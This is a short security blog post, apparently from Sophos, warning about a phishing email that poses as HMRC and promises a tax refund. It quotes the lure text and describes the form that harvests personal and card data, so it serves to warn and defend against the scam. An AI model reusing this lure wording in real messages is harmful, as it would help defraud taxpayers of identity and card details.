HMRC phishing scam promises end of year refund

HMRC logoEmails are currently circulating that purport to be sent by the UK tax organization HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible to receive a tax refund and that he or she must download an attached file and open it in a browser.

The scam e-mail reads in part:


Dear Taxpayer,
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

Opening the attached file displays a form which prompts the victim to fill in his or her full name, date of birth, complete address, phone number, and credit card or debit card information.

HMRC phishing form

Of course, submitting the form won’t actually send the information to HMRC; it will instead be sent to a malicious third party without the victim’s knowledge or approval.

Scam emails purporting to be sent by HMRC are not a new phenomenon; Naked Security has previously warned about similar scams in November 2010 and even in January and February 2009.

The good news for Sophos customers is that the phishing attachment is already detected as Mal/Phish-A by our products, including the free Sophos Anti-Virus for Mac Home Edition.

For those who may be interested, I’ve written a few additional details about this particular phishing scam on my own security blog.